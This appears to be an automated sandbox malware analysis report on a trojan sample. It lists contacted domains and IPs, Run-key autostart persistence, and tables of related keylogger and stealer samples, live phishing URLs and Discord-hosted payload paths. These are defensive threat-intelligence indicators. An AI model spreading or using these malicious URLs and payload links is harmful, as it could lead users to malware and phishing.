https://scratchdreams.tk	Pnihosiyvr.exe, 00000000.00000002.2332481252.000001A34568A000.00000004.00000020.00020000.00000000.sdmp, Pnihosiyvr.exe, 00000000.00000002.2327536841.000001A33D91A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2519177655.000002592BEA1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2517166281.0000000140002000.00000040.00000400.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2781011462.000001D2B1430000.00000004.00000020.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2774836682.000001D2A9582000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 0000000B.00000002.2862679952.0000020A90DE1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.3064626577.00000183579D1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.3229739212.0000016180001000.00000004.00000800.00020000.00000000.sdmp	false	15%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://reallyfreegeoip.org	MSBuild.exe, 0000000C.00000002.3064626577.0000018357B95000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.3064626577.0000018357AFC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.3064626577.0000018357C03000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.3064626577.0000018357BF0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.3064626577.0000018357BA8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.3064626577.0000018357BBB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.3064626577.0000018357B82000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.3229739212.00000161801B0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.3229739212.00000161801C4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.3229739212.000001618012D000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.microsoftS	MSBuild.exe, 0000000C.00000002.3069095152.0000018370213000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/mgravell/protobuf-net	Pnihosiyvr.exe, 00000000.00000002.2332061251.000001A3453E0000.00000004.08000000.00040000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2774836682.000001D2A9986000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2774836682.000001D2A9922000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	MSBuild.exe, 0000000C.00000002.3064626577.0000018357B2A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.3064626577.0000018357B95000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.3064626577.0000018357C03000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.3064626577.0000018357BF0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.3064626577.0000018357BA8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.3064626577.0000018357BBB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.3064626577.0000018357ADC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.3064626577.0000018357B82000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.3229739212.000001618010A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.3229739212.00000161801B0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.3229739212.00000161801C4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.3229739212.0000016180158000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://upx.sf.net	Amcache.hve.6.dr	false		high
http://checkip.dyndns.org	MSBuild.exe, 0000000D.00000002.3229739212.00000161801D7000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.3229739212.00000161800FA000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.com	MSBuild.exe, 00000003.00000002.2519177655.000002592BFB3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.3064626577.0000018357B95000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.3064626577.0000018357C03000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.3064626577.0000018357BF0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.3064626577.0000018357BA8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.3064626577.0000018357BBB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.3064626577.0000018357ADC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.3064626577.0000018357B82000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.3229739212.000001618010A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.3229739212.00000161801B0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.3229739212.00000161801C4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.3229739212.00000161801D7000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.discordapp.com	Pnihosiyvr.exe, 00000000.00000002.2326053740.000001A32CC01000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2769148817.000001D2987F1000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 0000000B.00000002.2853021181.0000020A80001000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Pnihosiyvr.exe, 00000000.00000002.2326053740.000001A32CC01000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2519177655.000002592BEA1000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2769148817.000001D2987F1000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 0000000B.00000002.2853021181.0000020A80001000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.3064626577.00000183579D1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.3229739212.0000016180001000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/156.146.36.197p	MSBuild.exe, 0000000C.00000002.3064626577.0000018357ADC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.3229739212.000001618010A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org/P6	MSBuild.exe, 0000000D.00000002.3235921937.00000161FBD46000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://checkip.dyndns.org/A	MSBuild.exe, 00000003.00000002.2519004275.000002592BD20000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/	Pnihosiyvr.exe, 00000000.00000002.2332481252.000001A34568A000.00000004.00000020.00020000.00000000.sdmp, Pnihosiyvr.exe, 00000000.00000002.2327536841.000001A33D91A000.00000004.00000800.00020000.00000000.sdmp, Pnihosiyvr.exe, 00000000.00000002.2326053740.000001A32CF85000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2517166281.0000000140002000.00000040.00000400.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2769148817.000001D298BAB000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2781011462.000001D2B1430000.00000004.00000020.00020000.00000000.sdmp, sssssssssssssssss.exe, 00000008.00000002.2774836682.000001D2A9582000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 0000000B.00000002.2862679952.0000020A90DE1000.00000004.00000800.00020000.00000000.sdmp, sssssssssssssssss.exe, 0000000B.00000002.2853021181.0000020A80380000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.3064626577.0000018357ADC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.3229739212.000001618010A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
158.101.44.242	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	true
162.159.135.233	cdn.discordapp.com	United States	13335	CLOUDFLARENETUS	false
172.67.177.134	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
162.159.134.233	unknown	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1424362
Start date and time:	2024-04-11 11:31:15 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Pnihosiyvr.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@15/10@4/4
EGA Information:	Failed
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.12.23.50, 199.232.214.172, 192.229.211.108, 52.165.164.15, 13.85.23.86, 40.126.24.148, 20.190.152.20, 20.190.152.19, 40.126.24.84, 40.126.24.81, 40.126.24.149, 40.126.24.82, 20.190.152.21, 20.189.173.22, 199.232.210.172
Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, slscr.update.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, umwatson.events.data.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
Execution Graph export aborted for target MSBuild.exe, PID 2128 because it is empty
Execution Graph export aborted for target MSBuild.exe, PID 5408 because it is empty
Execution Graph export aborted for target MSBuild.exe, PID 5640 because it is empty
Execution Graph export aborted for target Pnihosiyvr.exe, PID 6180 because it is empty
Execution Graph export aborted for target sssssssssssssssss.exe, PID 2608 because it is empty
Execution Graph export aborted for target sssssssssssssssss.exe, PID 6136 because it is empty
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
11:32:34	API Interceptor	1x Sleep call for process: Pnihosiyvr.exe modified
11:32:36	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run sssssssssssssssss C:\Users\user\AppData\Roaming\sssssssssssssssss.exe
11:32:44	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run sssssssssssssssss C:\Users\user\AppData\Roaming\sssssssssssssssss.exe
11:32:53	API Interceptor	1x Sleep call for process: WerFault.exe modified
11:33:18	API Interceptor	2x Sleep call for process: sssssssssssssssss.exe modified
11:33:20	API Interceptor	508x Sleep call for process: MSBuild.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
158.101.44.242	PsBygexGwH.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	SAT8765456000.xlam.xlsx	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	checkip.dyndns.org/
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	lxdriver_setup.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	checkip.dyndns.org/
	Hitomi Downloader.exe	Get hash	malicious	Agent Tesla, AgentTesla, RisePro Stealer	Browse	checkip.dyndns.org/
	e-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Payment_Draft_confirmation.xla.xlsx	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	ATM Dekont E-Maili pdf.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	checkip.dyndns.org/
	Halkbank_Ekstre_20240312_081829_752731.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Contract.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	checkip.dyndns.org/
162.159.135.233	Cheat.Lab.2.7.2.msi	Get hash	malicious	RedLine	Browse	cdn.discordapp.com/attachments/1166694393298817025/1171047481182793729/2.txt
	#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe	Get hash	malicious	Unknown	Browse	cdn.discordapp.com/attachments/1161633037004587060/1161731056462995496/lient.exe
	QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe	Get hash	malicious	AgentTesla, AveMaria	Browse	cdn.discordapp.com/attachments/1152164172566630421/1153190859320328273/Vvdsupbjet.exe
	We7WnoqeXe.exe	Get hash	malicious	Amadey RedLine	Browse	cdn.discordapp.com/attachments/878034206570209333/908097655173947432/slhost.exe
	mosoxxxHack.exe	Get hash	malicious	Amadey RedLine	Browse	cdn.discordapp.com/attachments/710557342755848243/876828681815871488/clp.exe
	Sales-contract-deaho-180521-poweruae.doc	Get hash	malicious	Unknown	Browse	cdn.discordapp.com/attachments/843685789120331799/844316591284944986/poiu.exe
	PURCHASE ORDER E3007921.EXE	Get hash	malicious	Snake Keylogger	Browse	cdn.discordapp.com/attachments/809311531652087809/839820005927550996/Youngest_Snake.exe
	Waybill Document 22700456.exe	Get hash	malicious	Nanocore	Browse	cdn.discordapp.com/attachments/809311531652087809/839856358152208434/May_Blessing.exe
	COMPANY REQUIREMENT.doc	Get hash	malicious	Snake Keylogger	Browse	cdn.discordapp.com/attachments/819674896988242004/819677189900861500/harcout.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
fp2e7a.wpc.phicdn.net	https://cloudflare-ipfs.com/ipfs/bafybeihqnui3i43lph6svx56opzeyj3gyyzxjf3s5i5l3mdj2klv5eneem/?openboxmailer/auto/eMail.web/987FTmail.authenticate/checking_auth0/authenticate-userid/84778949884903948993839/#Claudia.Giarratana.ext@daiichi-sankyo.it	Get hash	malicious	HTMLPhisher	Browse	192.229.211.108
	https://tarantula-mustard-8zh3.squarespace.com/	Get hash	malicious	Unknown	Browse	192.229.211.108
	http://minhaclaro.dtmmkt.com.br/effectivemail/redirecionaclique.aspx?idabordagem=5252932746&idlink=12609016866&endereco=//483.estatesalehelp.com//YWxpc3RhaXIuZ29yZG9uQGRhaWljaGktc2Fua3lvLmNvLnVr	Get hash	malicious	Unknown	Browse	192.229.211.108
	http://minhaclaro.dtmmkt.com.br/effectivemail/redirecionaclique.aspx?idabordagem=5252932746&idlink=126090168=%0A66&endereco=//mhkyapi%E3%80%82com/temp/___cmljaGFyZEBnbG9iYWx0ZWNobmljYWxyZWFsdHkuY29t___fphpdnwwfu	Get hash	malicious	Unknown	Browse	192.229.211.108
	https://test.ambasenegal-pl.com/base.php?c=17&key=66bf6845dbd8f0d53e07b779f6ab8f38	Get hash	malicious	Phisher	Browse	192.229.211.108
	1L62NY9ZQMprumk.exe	Get hash	malicious	AgentTesla	Browse	192.229.211.108
	http://www.ohp-puteaux.fr/	Get hash	malicious	Unknown	Browse	192.229.211.108
	http://www.sauvegarde-yvelines.org/	Get hash	malicious	Unknown	Browse	192.229.211.108
	https://urldefense.com/v3/__https://adclick.g.doubleclick.net/pcs/click?b2tuY41515N2435yMX419snVO7695-2024-McWAN324SCAN&&adurl=Atracker.club-os.comCcampaignclick8ymfqmsgId=d738c6bd137e6a03157c6c728cbc659e734fc39826test=false26target=neopartsBcomBbr2Fdodo2Fes8qj2F*2FamxpbjJAbW9vZy5jb20=$__;Ly8vLy8vLy8_JSXjgILjgIIlJSUl!!EhqYCQ!fXdc6vQjcCJOoS8BYlNUvv3DEx-Bdjf9gHdJcCKMrE6GO7o-8hvti7bNgb9cqWsZW4YBRttxc-7pog$	Get hash	malicious	Unknown	Browse	192.229.211.108
	http://www.dannyjarratt.com/	Get hash	malicious	Unknown	Browse	192.229.211.108
cdn.discordapp.com	https://yesterwebring.neocities.org	Get hash	malicious	Phisher	Browse	162.159.135.233
	LMZ05240257824426283637366563_Final Order.vbs	Get hash	malicious	FormBook	Browse	162.159.135.233
	fedex awb & invoice.vbs	Get hash	malicious	Unknown	Browse	162.159.129.233
	CDssd7jEvY.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse	162.159.133.233
	receipt.vbs	Get hash	malicious	XWorm	Browse	162.159.130.233
	https://href.li/?https://cdn.discordapp.com/attachments/1221320162280738921/1221322214310412378/SetupSuite_2024.022.24240_win64_x64.exe?ex=661227f2&is=65ffb2f2&hm=ee12df65239428a180edf35f277dd90ef7078e3783743f7508c5744eebbb23f1&	Get hash	malicious	Unknown	Browse	162.159.133.233
	https://href.li/?https://cdn.discordapp.com/attachments/1221320162280738921/1221322214310412378/SetupSuite_2024.022.24240_win64_x64.exe?ex=661227f2&is=65ffb2f2&hm=ee12df65239428a180edf35f277dd90ef7078e3783743f7508c5744eebbb23f1&	Get hash	malicious	Unknown	Browse	162.159.129.233
	SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse	162.159.133.233
	SecuriteInfo.com.W32.Kryptik.GYGF.tr.12827.18803.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse	162.159.135.233
	WAhYftpepO.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse	162.159.133.233
bg.microsoft.map.fastly.net	NervousGrammar.exe	Get hash	malicious	RHADAMANTHYS	Browse	199.232.214.172
	http://minhaclaro.dtmmkt.com.br/effectivemail/redirecionaclique.aspx?idabordagem=5252932746&idlink=12609016866&endereco=//483.estatesalehelp.com//YWxpc3RhaXIuZ29yZG9uQGRhaWljaGktc2Fua3lvLmNvLnVr	Get hash	malicious	Unknown	Browse	199.232.214.172
	http://minhaclaro.dtmmkt.com.br/effectivemail/redirecionaclique.aspx?idabordagem=5252932746&idlink=126090168=%0A66&endereco=//mhkyapi%E3%80%82com/temp/___cmljaGFyZEBnbG9iYWx0ZWNobmljYWxyZWFsdHkuY29t___fphpdnwwfu	Get hash	malicious	Unknown	Browse	199.232.210.172
	https://test.ambasenegal-pl.com/base.php?c=17&key=66bf6845dbd8f0d53e07b779f6ab8f38	Get hash	malicious	Phisher	Browse	199.232.210.172
	8QpxBYQvg1.exe	Get hash	malicious	PureLog Stealer	Browse	199.232.214.172
	http://www.ohp-puteaux.fr/	Get hash	malicious	Unknown	Browse	199.232.210.172
	YHvknO2uwv.exe	Get hash	malicious	Gh0stCringe, RunningRAT	Browse	199.232.210.172
	https://91.207.102.163/	Get hash	malicious	Unknown	Browse	199.232.210.172
	xthGoux7jA3I.exe	Get hash	malicious	AsyncRAT, PureLog Stealer	Browse	199.232.214.172
	https://att-mail-ins.weeblysite.com/	Get hash	malicious	Unknown	Browse	199.232.214.172
reallyfreegeoip.org	BmLue8t2V7.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	gZIZ5eyCtS.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	edlyEKgpaz.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	edlyEKgpaz.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	PsBygexGwH.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	58208 Teklif.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	Zarefy4bOs.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	Remittance_copy.pdf.scr.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	SAT8765456000.xlam.xlsx	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	104.21.67.152
	Purchase Order.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	nissrv.exe	Get hash	malicious	Xmrig	Browse	104.21.95.148
	https://cloudflare-ipfs.com/ipfs/bafybeihqnui3i43lph6svx56opzeyj3gyyzxjf3s5i5l3mdj2klv5eneem/?openboxmailer/auto/eMail.web/987FTmail.authenticate/checking_auth0/authenticate-userid/84778949884903948993839/#Claudia.Giarratana.ext@daiichi-sankyo.it	Get hash	malicious	HTMLPhisher	Browse	104.17.64.14
	Wave32bit.exe	Get hash	malicious	Unknown	Browse	104.21.95.148
	1.vbs	Get hash	malicious	AgentTesla	Browse	172.67.215.45
	SecuriteInfo.com.Win32.Evo-gen.30889.28387.exe	Get hash	malicious	Pafish	Browse	162.159.61.3
	New order -24900242 OP_pdf .exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	FACT AZUR TJ .pdf.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.13.205
	https://office.com+accounts=login+settings=private@m.exactag.com/ai.aspx?tc=d9110214bc40b07205bbd26a23a8d2e6b6b4f9&url=%68%74%74%70%25%33%41zemantools.com%2Fwell-known%2F1710753%2F%2FY2hyaXN0b3BoZS5sZWdyb3NAYWZ0cmFsLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	https://test.ambasenegal-pl.com/base.php?c=17&key=66bf6845dbd8f0d53e07b779f6ab8f38	Get hash	malicious	Unknown	Browse	104.17.25.14
	http://minhaclaro.dtmmkt.com.br/effectivemail/redirecionaclique.aspx?idabordagem=5252932746&idlink=12609016866&endereco=//483.estatesalehelp.com//YWxpc3RhaXIuZ29yZG9uQGRhaWljaGktc2Fua3lvLmNvLnVr	Get hash	malicious	Unknown	Browse	104.17.2.184
ORACLE-BMC-31898US	https://fixauthconnectapp.pages.dev/connection-module/	Get hash	malicious	Unknown	Browse	150.136.26.45
	https://streaklinks.com/B668awohoT-6Ye2tFgRXf5YV/https%3A%2F%2Fna4.docusign.net%2FMember%2FPowerFormSigning.aspx%3FPowerFormId%3D02d7044c-ca42-47bd-b048-f7d24113182f%26env%3Dna4%26acct%3D385d7234-0a2d-491f-a570-28297578e366%26v%3D2	Get hash	malicious	Unknown	Browse	192.29.14.118
	x2tgARMXmA.elf	Get hash	malicious	Mirai, Gafgyt	Browse	144.25.156.122
	gZIZ5eyCtS.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	edlyEKgpaz.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	PsBygexGwH.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	58208 Teklif.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	acZPG2kRsL.elf	Get hash	malicious	Mirai	Browse	132.145.48.205
	kIUmnxfdLQ.elf	Get hash	malicious	Mirai	Browse	193.123.7.164
	Zarefy4bOs.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
CLOUDFLARENETUS	nissrv.exe	Get hash	malicious	Xmrig	Browse	104.21.95.148
	https://cloudflare-ipfs.com/ipfs/bafybeihqnui3i43lph6svx56opzeyj3gyyzxjf3s5i5l3mdj2klv5eneem/?openboxmailer/auto/eMail.web/987FTmail.authenticate/checking_auth0/authenticate-userid/84778949884903948993839/#Claudia.Giarratana.ext@daiichi-sankyo.it	Get hash	malicious	HTMLPhisher	Browse	104.17.64.14
	Wave32bit.exe	Get hash	malicious	Unknown	Browse	104.21.95.148
	1.vbs	Get hash	malicious	AgentTesla	Browse	172.67.215.45
	SecuriteInfo.com.Win32.Evo-gen.30889.28387.exe	Get hash	malicious	Pafish	Browse	162.159.61.3
	New order -24900242 OP_pdf .exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	FACT AZUR TJ .pdf.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.13.205
	https://office.com+accounts=login+settings=private@m.exactag.com/ai.aspx?tc=d9110214bc40b07205bbd26a23a8d2e6b6b4f9&url=%68%74%74%70%25%33%41zemantools.com%2Fwell-known%2F1710753%2F%2FY2hyaXN0b3BoZS5sZWdyb3NAYWZ0cmFsLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	https://test.ambasenegal-pl.com/base.php?c=17&key=66bf6845dbd8f0d53e07b779f6ab8f38	Get hash	malicious	Unknown	Browse	104.17.25.14
	http://minhaclaro.dtmmkt.com.br/effectivemail/redirecionaclique.aspx?idabordagem=5252932746&idlink=12609016866&endereco=//483.estatesalehelp.com//YWxpc3RhaXIuZ29yZG9uQGRhaWljaGktc2Fua3lvLmNvLnVr	Get hash	malicious	Unknown	Browse	104.17.2.184
CLOUDFLARENETUS	nissrv.exe	Get hash	malicious	Xmrig	Browse	104.21.95.148
	https://cloudflare-ipfs.com/ipfs/bafybeihqnui3i43lph6svx56opzeyj3gyyzxjf3s5i5l3mdj2klv5eneem/?openboxmailer/auto/eMail.web/987FTmail.authenticate/checking_auth0/authenticate-userid/84778949884903948993839/#Claudia.Giarratana.ext@daiichi-sankyo.it	Get hash	malicious	HTMLPhisher	Browse	104.17.64.14
	Wave32bit.exe	Get hash	malicious	Unknown	Browse	104.21.95.148
	1.vbs	Get hash	malicious	AgentTesla	Browse	172.67.215.45
	SecuriteInfo.com.Win32.Evo-gen.30889.28387.exe	Get hash	malicious	Pafish	Browse	162.159.61.3
	New order -24900242 OP_pdf .exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	FACT AZUR TJ .pdf.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.13.205
	https://office.com+accounts=login+settings=private@m.exactag.com/ai.aspx?tc=d9110214bc40b07205bbd26a23a8d2e6b6b4f9&url=%68%74%74%70%25%33%41zemantools.com%2Fwell-known%2F1710753%2F%2FY2hyaXN0b3BoZS5sZWdyb3NAYWZ0cmFsLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	https://test.ambasenegal-pl.com/base.php?c=17&key=66bf6845dbd8f0d53e07b779f6ab8f38	Get hash	malicious	Unknown	Browse	104.17.25.14
	http://minhaclaro.dtmmkt.com.br/effectivemail/redirecionaclique.aspx?idabordagem=5252932746&idlink=12609016866&endereco=//483.estatesalehelp.com//YWxpc3RhaXIuZ29yZG9uQGRhaWljaGktc2Fua3lvLmNvLnVr	Get hash	malicious	Unknown	Browse	104.17.2.184

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
1138de370e523e824bbca92d049a3777	http://minhaclaro.dtmmkt.com.br/effectivemail/redirecionaclique.aspx?idabordagem=5252932746&idlink=12609016866&endereco=//483.estatesalehelp.com//YWxpc3RhaXIuZ29yZG9uQGRhaWljaGktc2Fua3lvLmNvLnVr	Get hash	malicious	Unknown	Browse	23.1.237.91
	https://test.ambasenegal-pl.com/base.php?c=17&key=66bf6845dbd8f0d53e07b779f6ab8f38	Get hash	malicious	Phisher	Browse	23.1.237.91
	1L62NY9ZQMprumk.exe	Get hash	malicious	AgentTesla	Browse	23.1.237.91
	http://www.ohp-puteaux.fr/	Get hash	malicious	Unknown	Browse	23.1.237.91
	https://broken-hat-112c.u4eulk3x.workers.dev/	Get hash	malicious	HTMLPhisher	Browse	23.1.237.91
	https://rxplusmart.su/	Get hash	malicious	Unknown	Browse	23.1.237.91
	https://b4jh4vk343444bvnvn4v443.z13.web.core.windows.net/	Get hash	malicious	Unknown	Browse	23.1.237.91
	http://themancav.com	Get hash	malicious	Unknown	Browse	23.1.237.91
